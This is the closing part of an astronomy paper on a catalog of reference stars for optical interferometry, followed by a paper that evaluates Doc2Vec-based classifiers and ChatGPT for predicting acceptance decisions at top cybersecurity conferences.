In the case of FLUOR, observations are carried out in the K' band (2.0-2.3 ñm) and these quantities have been computed in this band only. The effective wavenumber is the wavenumber at which the monochromatic visibility defined by Eq. (2) is equal to the measured wide-band visibility. If S denotes the star's spectrum multiplied by the filter's transmission profile, the effective wavenumber is As explained in Ref. 13, the wide-band fringe contrast measured by FLUOR is weighted by the squared stellar spectrum: The shape factor SF allows for a correct calibration when the spectral types of the target and its reference stars are different. Effective wavenumbers and shape factors should be mostly considered as relative information between stars of different spectral types. Their typical values are respectively 4685 cm −1 and 13.19 ñm, and vary very little from one spectral type to another.
Comments
This field is used to provide additional information about the source: the object type 14 as it is given by Simbad, the separations and the magnitudes of the companions when the source is a double or a multiple star.
CATALOG'S STATISTICAL PROPERTIES 4.1. Global statistics
A major feature of our catalog is its excellent sky coverage (Fig. 1): whatever the point on the sky, its distance to the closest reference star is less than 16.4 • and the median distance is 5.2 • . Most stars (91%) are class III giants with a spectral type K (82%) or M0 (18%). Also most stars (72%) have a visual magnitude between 4 and 6, and almost all of them (95%) between 3 and 7, with a median value of 5.0. As for K magnitude, most stars (95%) lie in the interval K=0-3 with a median value of 1.8. Limb-darkened angular diameters range from 1 to 10 mas (Fig. 2a) with a median value of 2.3 mas. The median error on the diameter is only 1.2% (Fig. 2b), which brings a significant gain (Fig. 2c)
Catalog's effective size
In the framework of a UD model, the relative error on the visibility reads assuming negligeable errors on the effective wavenumber and on the interferometric baseline. Figure 2c represents the visibility and the error on the visibility as a function of the reduced variable x. Equation (7) implies that the catalog's reference stars have not all diameter estimates accurate enough to allow a given precision on the visibility, whatever the wavenumber and the baseline. For example, the number of stars whose error on the angular diameter is small enough to be used for a given accuracy on the visibility in the K band and at a given baseline is given in Table 2, as well as displayed on Fig. 2d.
COMPARISON WITH OTHER DIAMETER DETERMINATIONS
We have searched the literature by the way of CHARM ‡ catalog 16 for other angular diameter determinations of the stars in our catalog. Angular diameters can either be estimated by photometric means or directly measured by LBSI or during a lunar occultation. In the following sections, we will examine two photometric methods and direct measurements performed by two interferometers. ‡ Catalog of High Angular Resolution Measurements Table 2. Catalog's effective size in the K band: number of stars whose error on the angular diameter is small enough to be used for a given accuracy on the visibility. The surface-brightness method 19 (SBM) provides another way to derive the angular diameter: where S V is the surface brightness in the V band. We have plotted on Fig. 3b the right-hand side of Eq. 8 vs. V−K. The superimposed values for our reference stars (crosses) match the curve nicely.
These two results demonstrate that the spectro-photometric method is completely consistent with other indirect methods.
Interferometric measurements
The NPOI and Mark III interferometers have measured the angular diameters of 21 stars belonging to our catalog. 20 We compare here the LD diameters deduced from the UD diameters measured in the visible, using a procedure very similar to the conversion process described in Sect. 3.2. Again, the agreement is very good (Fig. 3a): a linear least-square fit to the data yields θ LBSI = (1.03 ± 0.01) × θ SPM + (−0.15 ± 0.03). The average precisions of the NPOI and Mark III data are respectively 1.9% and 1.6%. A chi-square analysis of the difference θ SPM − θ LBSI shows a good compatibility of the error bars since χ 2 equals respectively 3.0 and 2.4.
CONCLUSION
We have presented a catalog of 374 carefully chosen reference stars for optical interferometry. Depending on the needed precision on the visibility, it is well suited for interferometers with baselines up to 200 m. Although this catalog has proven to be fully satisfactory since its first use by the FLUOR team in october 1999, most stars have not yet been observed by any interferometer and still need to be checked. More work lies ahead to extend this catalog to reference stars suitable for longer baselines, such as the baselines of CHARA 21 (330 m) and 'OHANA 22 (800 m), or to instruments with very high accuracies like AMBER. 23 | 2014-10-01T00:00:00.000Z | 2003-01-22T00:00:00.000 | {
"year": 2003,
"sha1": "d8902f95f9e337e68bba3a2c628d4e76fe960541",
"oa_license": null,
"oa_url": "http://arxiv.org/pdf/astro-ph/0301434",
"oa_status": "GREEN",
"pdf_src": "Arxiv",
"pdf_hash": "932366c9d508640f8f649cf352f23dc778234194",
"s2fieldsofstudy": [
"Physics"
],
"extfieldsofstudy": [
"Engineering",
"Physics"
]
} |
261696572 | pes2o/s2orc | v3-fos-license | Unveiling the Sentinels: Assessing AI Performance in Cybersecurity Peer Review
Peer review is the method employed by the scientific community for evaluating research advancements. In the field of cybersecurity, the practice of double-blind peer review is the de-facto standard. This paper touches on the holy grail of peer reviewing and aims to shed light on the performance of AI in reviewing for academic security conferences. Specifically, we investigate the predictability of reviewing outcomes by comparing the results obtained from human reviewers and machine-learning models. To facilitate our study, we construct a comprehensive dataset by collecting thousands of papers from renowned computer science conferences and the arXiv preprint website. Based on the collected data, we evaluate the prediction capabilities of ChatGPT and a two-stage classification approach based on the Doc2Vec model with various classifiers. Our experimental evaluation of review outcome prediction using the Doc2Vec-based approach performs significantly better than the ChatGPT and achieves an accuracy of over 90%. While analyzing the experimental results, we identify the potential advantages and limitations of the tested ML models. We explore areas within the paper-reviewing process that can benefit from automated support approaches, while also recognizing the irreplaceable role of human intellect in certain aspects that cannot be matched by state-of-the-art AI techniques.
Introduction
The scientific review and decision-finding process is highly relying on peer reviewers' judgment and agreement. The decisions finally rely on their judgment and discussion based on aspects like technical correctness, novelty, and coverage of experimental results [31] but also more subjective aspects like creativity, applicability, and scientific contribution. Even though biased, no better approach than human inspection is known for judging scientific progress. At the same time, advances in Artificial Intelligence (AI) and machine learning (ML) raise the question, to which level AI models could act as a reviewer in the scientific review process [32]. Analyzing the difference between human review results and ML predictions can provide a way to uncover hidden aspects of the decisionmaking process. The application of ML for the prediction of reviewing outcomes is interesting as an area as it challenges both the limit of AI and the logic of scientific publication in the first place. We expect that ML-based techniques can be used to predict a certain part of the review decision process, but not fully.
We have set out to investigate this question for computer security and privacy since this research area has seen a tremendous increase in paper submissions in recent years, which has challenged the peer-reviewing process at first-tier security conferences 3 and the reviewers' ability to provide timely and comprehensive reviews. Organizers of those conferences have expanded the pools of reviewers, introduced journal-like paper revision opportunities and the submission of commented prior reviews, but the wealth of submissions remains challenging to handle. We direct readers to Appendix A for a detailed introduction of the peer review process in "Big-4". Recently, Soneji et al. [31] investigated the peer-review process in the computer security field using qualitative research methods (interviews). Our work is complementary as we conduct a quantitative investigation.
Related endeavors were pursued in other research areas of computer science. The computer vision community presented methods for automatically deriving a measure of paper quality based on basic visual features of papers [38,15]. However, this line of research is solely based on the visual appearance of papers, ignoring the textual contents. In Natural Language Processing (NLP), researchers proposed text-based methods to grade essays [18], answer mathematical questions [17], assess handwritten work [29], and evaluate papers [41] (achieving an accuracy of below 68%). Due to the recent emergence of ChatGPT [23], there has been a surge in efforts to explore its application as an auxiliary academic reviewer or as a tool for assisting in paper reviewing [22,13,32].
In this paper, we investigate the performance of AI in the domain of cybersecurity academic paper reviewing. Specifically, we develop a pipeline consisting of a Doc2Vec [20] model for document embedding and ML classification models trained to predict acceptance or rejection based on these vector representations. We compare our proposed pipeline with ChatGPT. To construct a comprehensive dataset for training and testing, we gather a substantial collection of publicly accessible papers from leading computer science conferences, amounting to over 10,000 papers. One significant challenge we face is obtaining a negative sample set for ML training. Since submitted papers are not publicly available until proceedings are published, we employ alternative approaches. We approximate a negative sample set by utilizing public archival versions of papers provided by authors and employ several heuristics in the selection process.
In short, the major contributions of this paper are: 1. We build a large dataset with over 14,000 papers. It consists of over 10,000 accepted conference papers and over 4,000 preprint papers collected from the arXiv preprint website. 2. We train ML models to predict whether a paper is to be accepted by top-tier conferences in computer security and privacy and show their quantitative predictive results. Our experiments show that our best models can achieve approx. 91% accuracy in predicting the reviewing decisions for security papers, significantly outperforming ChatGPT. 3. We conduct further experiments to explore the capability of our method in dealing with abstracts and novel papers. Subsequently, we analyze the experimental results, present the insights gained, and discuss the implications of both ChatGPT and the proposed pipeline in relation to the current peerreview system.
Related Work
Several approaches have been proposed for similar tasks [21], broadly classified into two categories: vision-based and text-based approaches.
Vision-based Approaches. Von Bearnensquash [38] proposed a method based on AdaBoost to classify an academic paper using the paper's appearance (i. e., paper gestalt). The author first turned papers into pictures using pdf-to-image conversion tools and then trained a classifier using the image features extracted from these pictures. Later on, Huang [15] extended this idea by leveraging deeplearning models. The author also built a generative model that could generate paper gestalts that would be accepted by the classifier. The author concludes figures and tables are crucial factors for predicting the decision. However, these trained models are not suitable for predicting reviewing results of security papers since security papers differ from computer-vision papers in general. Essentially, vision-based methods only consider paper layout and neglect paper contents. When papers are being reviewed, the criteria are focused on the contents (e. g., writing quality, novelty, contribution, etc.). That is why our method considers text content rather than paper layout as a feature. Text-based Approaches. Taghipour et al. [35] proposed neural network models including CNN and LSTM [14] for the task of automated essay scoring. The authors compared neural networks with different settings in their experiments. Alikaniotis et al. [1] also leveraged neural networks in their paper. The authors proposed an augmented C&W model [10] with LSTM to score essays on a Kaggle dataset. Even though their methods are relevant to ours, their aim is focused on scoring educational essays rather than scientific papers, which fundamentally differs from our goal. We consider a 2018 paper from Yang et al.
[41] to be the most relevant research to our goal. They first proposed a new task called automatic academic paper rating. The authors built a new dataset using papers collected from arXiv and proposed a modularized hierarchical CNN as a classifier. Their method is claimed by the authors to be the state-of-the-art method to rate academic papers. However, they do not focus on papers on computer security and insights into the peer-review paradigm. Another interesting research was conducted by Bartoli et al. [3] who proposed a model for the automatic generation of scientific paper review comments. Their goal is to generate reviews for scientific papers that could deceive people. They use traditional methods rather than neural networks to avoid the requirement of a large amount of training data.
Our work differs from these related works as follows: (1) Our model is a classification model which predicts the decision of an academic paper. (2) We focus on computer security conference papers. (3) Our discussion is focused on the peer-review process. (4) We provide comparison with ChatGPT.
Besides the aforementioned technical works, a recent IEEE S&P paper by Soneji et al. [31] is a great inspiration. They conducted a qualitative study of 21 reviewers and chairs to understand the peer-review process in computer security. Over half of the participants shared negative sentiments toward the current review system. Their findings motivate us to explore the predictability of peer-review outcomes for security papers.
Background
Doc2Vec. Doc2Vec [20], as its name suggests, is a method to represent a document by a vector. It is a method developed on the basis of Word2Vec. Doc2Vec is also an unsupervised learning method and it could benefit from a large dataset. We leveraged this feature of Doc2Vec and trained our model on a large set of academic papers to enable Doc2Vec to generate high-quality document embedding for the ML-based reviewing process. ChatGPT. ChatGPT [23], developed by OpenAI, is an advanced chatbot that utilizes a large language model (LLM) and state-of-the-art language modeling techniques to generate responses that closely resemble human-like conversations. Through extensive training on diverse textual data, ChatGPT demonstrates an impressive ability to comprehend and produce coherent and contextually appropriate replies. Notably, recent research suggests that GPT model represents an early version of an artificial general intelligence (AGI) system, although it remains incomplete [8]. The integration and utilization of ChatGPT in academic settings have sparked discussions [16,33].
Data Collection
To train and test the paper classification models, a dataset with a large number of scientific papers is needed. Since there exists no dataset which can be utilized directly, we first need to create such a dataset.
Given the unsupervised nature of Doc2Vec's learning approach (See Section 4.2), its performance improves with larger training data. However, the limited number of security conference papers impedes the training of Doc2Vec. To overcome this limitation, we gather accepted papers from prominent computer science conferences outside the realm of security. These conferences cover a wide range of topics and employ shared vocabularies, making them suitable for pre-training the Doc2Vec model. To generate high-quality embedding representations for security papers, we adopt a transfer-learning approach: Our Doc2Vec model undergoes initial training on general computer science papers, followed by fine-tuning on computer security papers. To create the datasets, we collected published papers from first-tier computer science conferences encompassing domains such as computer vision, networking, and security, among others. We also incorporate papers sourced from the arXiv preprint website into our training data as negative (reject) samples; the details are explained in the following subsection.
Dataset Composition
Our dataset contains two subsets: Proceedings and Preprints. An overview of the these two datasets is provided in Table 1.
The proceedings subset consists of over 10,000 published papers sourced from top computer conferences, encompassing both security-specific venues and broader computer science domains. Detailed statistical information regarding the conferences, their venues, and sample sizes can be found in Table 5 (Appendix).
The preprints subset comprises papers obtained from the arXiv preprint website. This subset plays a crucial role in the second stage of training, where our proposed models aim to determine the acceptance or rejection of papers by the "Big-4" conferences. We opted to utilize the arXiv dataset as negative (rejected) paper samples, employing well-defined selection rules (outlined below). This approach serves as an approximation of real review outcomes from actual security conferences, as acquiring such data directly presents challenges both logistically and ethically: First, accessing review processes is difficult due to the closed and confidential nature of the review process. Second, it would be inappropriate to collect papers and review outcomes without approval from the authors and reviewers at the time of submission.
Thus, we focus our attention on public sources of data, and after careful consideration, we have identified arXiv as a viable and rational choice. Widely embraced by the computer science community, arXiv offers a substantial volume of training samples. Furthermore, its research-friendly policy allows us to utilize the data without ethical concerns. We acknowledge that this approach is not without limitations. Extracting papers from arXiv, which are likely to have been submitted to and rejected by the "Big-4" conferences, is subject to errors and serves only as an approximation of actual review outcomes. Nonetheless, we contend that our meticulous selection process, guided by heuristic rules, sufficiently reflects reality. In particular, we use published papers as positive samples, while negative samples are selected from the arXiv preprint papers based on specific criteria outlined below. The selection process for negative samples focuses on papers labeled with cs.CR on arXiv (indicating they belong to the security domain) and employs the three following heuristic rules: -Rule 1: For arXiv preprint papers that ultimately appear in the "Big-4" conferences, if one paper has multiple versions on arXiv and its first version is at least one year older than its last version, then we consider the first version paper as the negative sample. This rule is based on the reasoning that, if a paper got accepted by the "Big-4", and it has evolved for at least a year before the acceptance, then we believe its first version is already good but just not of enough quality to be accepted by the "Big-4", which makes it suitable to be used as a negative sample. Considering the improvement of content also takes time, we choose one year as a crude estimation of the heuristic threshold based on our experience in refining the papers.
-Rule 2: For arXiv preprint papers that have finally appeared on lower ranked security conferences 4 , we consider their first arXiv version as the negative sample. The reasoning here is that, if a paper got accepted by lower ranked security conferences, then it is possible they were first submitted to the "Big-4", got rejected and then submitted to other conferences. Even if this is not the case, we believe these papers are of good quality, but just not enough to get accepted by the top venues in the field. -Rule 3: If an arXiv preprint paper does not get published at all and it was created prior to 2018, then we consider it as a negative sample. This rule serves as a supplement to ensure the generation of a balanced training set when the first two rules do not yield a sufficient number of samples. The rationale behind this rule is that preprint-only security papers are likely submissions to the "Big-4" conferences or other reputable security conferences that did not receive acceptance. We limit the inclusion of preprint papers created before 2018, as more recent papers may still be undergoing the review process.
We obtained a total of 43, 423, and 3,754 papers based on the three rules, respectively. It is worth noting that not all of these negative samples were utilized for training. With the proposed three rules, we identified more negative samples in the arXiv dataset than the positive samples from "Big-4" conferences. To balance the ratio of positive and negative samples, some papers selected from Rule 3 are randomly dropped. Since there are 3984 positive samples, the number of negative samples was adjusted accordingly. The final numbers of negative samples used for training, based on the three rules, are 43, 423, and 3,518, respectively.
Data Acquisition
All papers in the proceedings subset we collected can be downloaded from public websites. We developed automated crawlers to retrieve a subset of accepted papers from various conference websites, supplemented by manual downloads for the remaining papers.
For the preprints subset, we first fetch the arXiv metadata from Kaggle 5 , and then use a crawler to download all the cs.CR papers from export.arxiv.org. We further use the DBLP 6 search function to check the venue information for all the downloaded papers so that we could select negative samples based on the heuristic rules. The DBLP team has a rigorous process of quality checking all new additions to the database [36]. The search function of DBLP is powered by CompleteSearch [5]. We conducted tests to assess the efficacy of the DBLP search function. The retrieval results were found to be accurate, even in cases where a few words were missing from the paper's title. It is important to note that significant changes in a paper's title may limit the effectiveness of the DBLP search function. However, we contend that the core keywords within the title generally remain consistent, reinforcing the reliability of the search function even in instances where the title undergoes substantial modifications.
Methodology
We first present our terminology (Sec. 4.1) before we elucidate the fundamental principles of vector embeddings as basic problem definition (Sec. 4.2). We then delve into the intricacies of our paper classification process (Sec. 4.3), Figure 1), and outline our methodology for conducting the ChatGPT experiment (Sec. 4.4).
Terminology
The reviewing process can be viewed as a text classification problem, and its formal definition is given here. We gathered papers from top conferences and let them be a set D = {d 1 , . . . , d N }, where N = |D| is the number of papers. Each paper consists of M words and is represented as where M is the number of words in the paper. Then the raw papers are mapped to a high-dimensional vector space by the Doc2Vec model, after which each paper d i is represented as d i .
Definition. The binary classifier, denoted f (·), is the function defined by where η(·) is an ML classification algorithm, giving out a prediction probability score between [0, 1] based on the input vector. "1" means the classifier predicts the acceptance of the corresponding paper, while "0" indicates rejection.
Problem Definition: From Papers to Vector Embeddings
Here we briefly introduce how to use Doc2Vec to transform an original paper into a high-dimensional vector.
In the Doc2Vec framework, every raw paper is projected to a unique document vector [20], represented by a column in the matrix and every word in the paper is also mapped to a unique vector during training, represented by a column in a matrix W. Given a paper d i and a sequence of words in the paper w 1 , . . . , w M , the objective function of the Doc2Vec model is to maximize the average log probability function where k is the size of the training context and θ denotes the model parameters.
The document vector d i here represents the missing information from the current context and can act as a memory of the topic of the document. Given the linear nature of the text, the contexts are fixed-length and sampled using a sliding window over the consecutive words. For machine learning problems, we generally like to minimize the value of a cost function, so a negative sign will be added to the right side of J(θ) to make it a cost function J ′ (θ) in training. The context probability can be obtained by a multiclass classifier, e. g., softmax function. Accordingly, we have in which all the y i are the logits output from a neural network used for training.
Since it is a problem finding the minimum of the cost function J ′ (θ), it is natural to use the gradient descent optimization algorithm. The gradient is obtained via backpropagation. And then we use gradient descent to train the document vectors and word vectors and update the parameters in the model.
After the training stage, we employ the model to perform an inference stage to calculate the document vector for a new paper. The outcome is then directly fed into machine-learning classifiers, e. g., Naïve Bayes, Logistic Regression, support vector machines, or KNN for prediction. Finally, we use these classifiers to predict whether the paper will be accepted or not.
Method: From Preprocessing to Classification
Our proposed methodology comprises three primary stages (see Figure 1): 1. Preprocessing: First, PDF files are converted into textual data, after which anonymization is performed by removing author names and affiliations. Subsequently, the corpus is normalized. 2. Obtaining document embedding: Then, we turn the normalized corpus into document embeddings (latent space representations) using a trained Doc2Vec model. 3. Classification: Finally, we use classification algorithms to classify the embeddings. Different algorithms are tested for comparison. Preprocessing of Collected Data: The collected papers are processed into the proper form to ensure their compatibility with subsequent modeling steps.
-PDF to Text. All collected PDF papers require conversion to plain text for compatibility with NLP models such as Doc2Vec. The tool used for such a task is the open source software PDFMiner [24]. -Text Normalization. Following the conversion of PDF to plain text, we normalize the text to enhance efficiency during Doc2Vec training. The normalization techniques that we use in the preprocessing include: Contraction Expansion, Lemmatization and Stemming, Stop Word Removal, etc. In addition to conventional text normalization techniques, we employ task-specific methods to process and normalize the corpus. This involves removing extraneous content such as author information, bibliography, and publication-related details from the documents. These techniques ensure that our pipeline is double-blinded just like the double-blind peer-review process, which is different from previous NLP-based researches that often take account of the authors [41]. Document Embedding: Different methods can be used to generate document embeddings (Section 2). Our choice is to use Doc2Vec for the proposed automatic paper reviewing pipeline because it is simple yet powerful, unsupervised, and able to get better as the training set becomes larger. To enhance the embedding generation capability of the Doc2Vec model for computer security papers, a twophase training approach is employed. In the initial pretraining phase, the model is trained on a comprehensive dataset consisting of both security and non-security computer science papers, utilizing papers from both subsets. Subsequently, in the second phase, the model is fine-tuned exclusively on security papers to enhance its sensitivity to the security domain. Classification: In our experiments, 14 widely used ML classification algorithms are tested. Our negative sample in the preprints subset consists of more than 4, 000 papers. However, the number of "Big-4"-published papers we could collect in the proceedings subsets is not enough, which creates an imbalanced ratio of positive and negative samples. This may significantly affect classification results, because the algorithms all assume a 50% to 50% ratio of positive and negative samples. If they are trained with such an imbalanced dataset, the classifiers will learn to lean toward rejection over acceptance. To address the imbalanced data issue, we first tried SMOTE (Synthetic Minority Over-sampling Technique) [9] to resample the data, however, the results were not promising. Hence, we decided to abandon a randomly selected part of the negative samples selected from heuristic rule 3, to make the number of negative samples equal to the number of positive samples. Finally, we work with 3, 984 positive samples (all are published "Big-4" papers) and 3, 984 negative samples (arXiv preprints selected by heuristic rules).
ChatGPT-based method
We limit the testing data for ChatGPT experiment to papers published after Sept. 2021, aligning with the training data and knowledge cutoff date of ChatGPT 3.5. Since ChatGPT possesses information regarding review outcomes for papers preceding this date, we focus on utilizing data from after September 2021 to enable ChatGPT to predict unseen papers rather than reiterating its existing knowledge. Specifically
Experimental Evaluation
We conduct experiments to report the predictive results of the proposed method and report the results on ChatGPT.
Experimental Results
As a baseline for comparison, we assume that there is an oracle that randomly determines if a paper will be accepted or rejected without bias. Therefore, the accuracy that the oracle gives a correct prediction is 50% all the time. We compare various ML models to this Random Guess baseline. We tested 14 different classification algorithms, as well as two model ensemble methods, Voting and Stacking. The final classification results regarding each algorithm are shown in Table 2. Among all the classifiers, the average accuracy on testing data is 85.56% and the median accuracy is 88.14%. The average F1 score is 0.8492 and the median F1 score is 0.8809, respectively. Moreover, most classification algorithms could finish training and testing in half a minute. In fact, the inference time of all these models could almost be neglected, because most of the time is spent on training.
Results of Model Ensemble
Model ensemble is the method that uses a set of ML models to obtain better predictive performance than any of a single learning model alone [26,27]. By doing so, the final results can "learn from each other's strength", integrate the learning capabilities of each model, and improve the generalization ability of The selection of models follows the principle of diversity and performance to ensure high robustness and high accuracy of the ensemble model. The final estimator we used in "Stacking" strategy is a decision tree classifier. The model ensemble results are shown in the "Voting Classifier" and "Stacking Classifier" rows of Table 2. According to the results, we can find that both ensemble models' accuracy and F1 score are higher than 0.85. Especially, the "Voting" strategy achieves 0.91, which is similar to the best results in all the classification algorithms we test. Theoretically, an ensemble model is usually more robust than a single classifier. So in the following discussions, we will use the "Voting" strategy classifier as the representation of the experimental result. Generally, the obtained accuracy and F1-scores per model are rather close to each other, indicating that the false negative and false positive rates are similar.
Using Abstracts for the Prediction
One interesting idea worth to further explore is to see the accuracy of merely using the paper's abstracts for prediction. To explore this question, we extract the Abstract section from raw papers and then use a Doc2Vec model trained for paper abstracts to convert them to high-dimensional embeddings. Specifically, we look for the text between "Abstract" section and "Introduction" section. And if these two sections are not able to be located, then we use the first 2,000 characters Table 3: ChatGPT Results. The "Answer" column represents the appropriate responses obtained. "Accept" and "Reject" columns indicate the count of Accept and Reject predictions generated by ChatGPT, respectively. in the documents to represent abstract as a remedy. The extracted abstract is normalized and then used for training and testing. The experimental result on the abstract-only prediction is shown in Table 2 "Voting on Abstract" row. The accuracy and F1 scores we get using the "Voting" classifier are 83.06% and 0.8303, respectively. Compared to whole paper prediction, the performance degrades when we predict the result merely relying on the abstract, which is consistent with our intuition. In general, an abstract includes a paper's core idea, methodology, experimental results (e. g., whether it achieves the SOTA performance), etc. from a high level. That is to say, the abstract is a good indicator of the corresponding paper's applicability, and scientific contribution which are usually used as the criteria to determine whether a paper should be accepted or rejected. Although there is performance loss, it still shows that the accuracy is much better than the Random Guess baseline. In addition, it is worth noting that using abstracts alone to predict the result is much faster than using the whole paper.
Results of ChatGPT
We performed experiments using the OpenAI API to assess ChatGPT's performance. Two types of inputs were tested: the full text of the paper and only the abstract. Throughout the experiments, we encountered instances where our requests did not get a response from the OpenAI system due to their internal errors, as well as cases where ChatGPT's replies did not align with our prompts. We filtered out these erroneous answers and focused solely on the appropriate correspondences. The experimental results, presented in Table 3, indicate that the accuracy of ChatGPT as a reviewer is only comparable to random guessing, irrespective of the input type. Notably, ChatGPT demonstrated a tendency to predict "Accept" for all papers. We will further discuss these findings in the subsequent discussion section.
Discussion
In this section, we discuss our experimental results, insights into predicting peer review outcomes, and the broader implications of employing AI methods in the peer-review process.
Discussion of Experimental Results
Algorithmic Fit. As shown in Section 5, 12 of the 14 classification algorithms we have tested could obtain testing accuracy higher than 80%. The two ensemble models both obtain testing accuracy higher than 85%. In contrast, ChatGPT only achieves an accuracy of approximately 50%. These results demonstrate the basic effectiveness of Doc2Vec method. More specifically, SVM-based methods (with different kernel functions) all achieve high accuracy with a relatively reasonable amount of training and testing time. Notably, the SVM with a linear kernel demonstrates the highest accuracy and F1 score. Naive Rejecter. We note that the accuracy results on the submissions subset are mostly between 80% and 90%. Let us consider a naive classification algorithm, called the "rejecter", which simply "rejects" every submitted paper in the "Big-4" conferences paper reviewing process. Due to the low overall acceptance rate of approximately 20% in these conferences, the rejecter can achieve a similar accuracy of around 80%. However, this rejecter's high accuracy is irrelevant to our objective of exploring the predictability of the reviewing process in security conferences. Furthermore, the rejecter's performance does not undermine our experimental results and analysis. Firstly, we intentionally constructed a balanced dataset to ensure that the classification algorithms have no prior knowledge of the acceptance rate, allowing them to evaluate each paper solely based on its content. Secondly, we thoroughly examined the prediction results (confusion matrix) of each classifier and found that they do not exhibit a bias towards accepting or rejecting papers. ChatGPT's tendency will be discussed separately. Notably, most classifiers had a smaller number of False Negatives (FN) compared to False Positives (FP). However, in general, the FP and FN rates were similar. Impact of Novelty. A common concern about ML-supported scholarly review is that algorithms are not able to measure the novelty of a paper, or at least they are not as good as domain experts. This worry is legitimate because all existing automatic review models, including our model, are trained on historical data which inherently leads to model failure when they are dealing with unseen novel papers. In an attempt to test the ability of our method when dealing with the novelty aspect of papers, we design an experiment by excluding the recent years (2019-Now) of the "Big-4" security papers from our training dataset. Measuring the impact of novelty directly is intractable. The assumption and intuition behind our design is that as the security community advances year by year, the distribution gap between published papers and historical papers used for training becomes larger. For example, assuming that Γ year denotes the distribution of papers from a particular year and Γ training the distribution of all papers in the training set, then: Γ 2022 − Γ training > Γ 2019 − Γ training . Papers with greater novelty presumably cultivate a larger gap compared to historical papers. Therefore, if our method is bad at predicting papers with larger delta, then it will not be good at predicting novel papers.
We tested this hypothesis using our experiments and obtained the following mean accuracy values from each years' "Big-4" conferences: 90.2% (2019), 90.3% (2020), 88.2% (2021), and 86.8% (2022). The results demonstrate a (non-strict) declining tendency. Based on this declining tendency and general intuition, we presume that the novelty of a paper will weakly fertilize a negative impact on the classifier, making a novel paper more likely to be rejected, which is the opposite of what we want from the review process. Hence, the paper novelty aspect should be countered by a particular human-in-the-loop rating or general consideration.
Limitations. Beyond weaknesses in dealing with novelty as discussed, we identified two limitations, both of which could make results favorable to higher accuracy. First, the papers we collect for training and testing are not from real "Big-4" submissions, which makes prediction easier than in the real scenario because the distribution of published "Big-4" papers is different from the distribution of selected arXiv preprint papers. Whereas in the real-world "Big-4" reviewing process, the submitted papers are more similar, making outcomes harder to predict. Second, our text normalization strategies, especially anonymization and publication information removal, are rather simple heuristics that may not be able to cover all cases. Therefore, we cannot rule out that some classifiers learn how to distinguish these corner cases in training.
ChatGPT Results. While ChatGPT is a highly advanced language model, it is primarily designed as a general-purpose chatbot and not specifically trained for reviewing papers. Several potential explanations can be considered to account for its poor performance: 1) Lack of domain-specific knowledge. ChatGPT's training is based on a diverse range of internet text, limiting its knowledge in specific research domain necessary for proficient paper reviewing. Reviewing papers often requires expertise and understanding of the research landscape within a specific field or subject that ChatGPT may not possess to the same extent. 2) Inherent bias: One potential factor contributing to the observed pattern of significantly more accept predictions than reject predictions by ChatGPT could be the presence of a bias in its response generation. ChatGPT is programmed to adopt a positive and polite attitude, which may influence its tendency to favor accept predictions over reject predictions.
3) Lack of in depth contextual understanding: While ChatGPT can generate coherent responses based on the input it receives, it may not fully grasp the nuances and subtleties involved in security papers. Reviewing papers requires a deep understanding of the research methodology, experimental design, statistical analysis, which may be beyond the scope of ChatGPT's capabilities. 4) Forgetting: ChatGPT's working memory is notably constrained, leading to a limited capacity for retaining detailed information and contextual understanding within lengthy academic texts. 5) Hallucination: One notable limitation of ChatGPT is its tendency to generate outputs that may sound plausible but lack a genuine understanding of the input. This phenomenon, known as hallucination, poses a significant drawback to the reliability of ChatGPT's responses. We observed instances of hallucination when we noticed inconsistent predictions from ChatGPT for the same paper, with conflicting recommendations for acceptance and rejection. 6) Token limitation: ChatGPT 3.5 is constrained by a token limit of 4K, neces-sitating the segmentation of complete paper texts into smaller chunks. While researchers have proposed transformers with extended token capacities [7], Chat-GPT has not yet incorporated these advancements.
In contrast to the proposed methods, ChatGPT possesses an advantage in its ability to provide explanations for the acceptance or rejection of papers. However, these explanations may also be subject to hallucination and lack a true understanding of the underlying reasons.
AI and Peer Review
Academic communities rely on peer-reviewing to decide on the acceptance of newly written papers and provide useful suggestions for improving research works. In the journey of practicing it, researchers have also recognized the pros and cons of such systems [31,34,6,30]. In this section, we would like to discuss the current review system, possible improvements to it, and how ML methods could be used to improve the review system. Peer Review -An Imperfect Working System. As Soneji et al. concluded in their paper [31], the current peer-review system is "flawed, but we don't have a better system". The reviewers, just like any other human beings, could be affected by non-academic factors when they are making decisions, not to mention different reviewers could have totally different, but still well-justified judgments on the same paper. It is natural for researchers to be curious about the consistency in peer-review process. To the best of our knowledge, this kind of study is yet to be done in cyber-security communities. But there is a famous "the NIPS experiment" from Cortes and Lawrence in the ML community, who made 1/10th of the papers submitted to NIPS 2014 be passed through the review process twice independently for analyzing the review outcomes [11]. They found a consistency of the NIPS 2014 review process of just 25.9%, and only 43% of papers accepted to the conference would be accepted again if the conference review process were repeated [37]. The result is so interesting that many researchers gave comments and participated in discussions [19]. Similar experiments and analysis have been conducted since [4,28,37], with similar results. Explorations toward a Better Peer-Review System. Researchers are innovators and they do not stop exploring. The computer science community has made efforts to explore a better peer-review system. OpenReview 7 has appeared as one of the most noticeable new review systems in the last decade. It was created to promote the open peer-review model in the computer science community, which means the submitted papers, reviewer's comments, authors' replies and other materials relating to the review process are open online to the public so that more researchers get access to the traditionally undisclosed review process. It seems that such open strategy does improve the peer-review system in terms of consistency [37] and also gives researchers the opportunity to analyze the review system for finding improvement measures.
The "Big-4" security conferences have not experimented with an open peerreview model. Smaller security conferences occasionally have, an example being ACM WiSec 2016 that experimented making meta reviews of accepted papers publicly available on their website. 8 Although this is not a fully open peer-review paradigm, it can be considered as a step of the cyber-security community in trying to promote a peer-review system toward more openness. We would like to encourage the use of OpenReview in the cyber-security community to explore if we can together make the review process more open. An open peer-review process not only facilitates communication among researchers, but also allows more analysis on review system and better data for the researchers. Involve AI in Peer-Review Systems. The advancements ML and AI have opened up possibilities for tackling complex real-world tasks with more intelligent algorithms. This progress prompts an intriguing and promising exploration of how ML can enhance the peer-review system, not only to alleviate the reviewers' workload but also to improve its overall effectiveness. While it is evident from our experimental results and discussions that no ML or AI model can replace human reviewers' capabilities, there is still potential for ML methods to serve as supplementary or complementary components within the peer-review system. Notably, researchers have been investigating ML novelty detection [25], a task for detecting test data that are different from training data in some aspects. Particularly, Amplayo et al. proposed a network-based approach to detect novelty of scholarly literature [2].
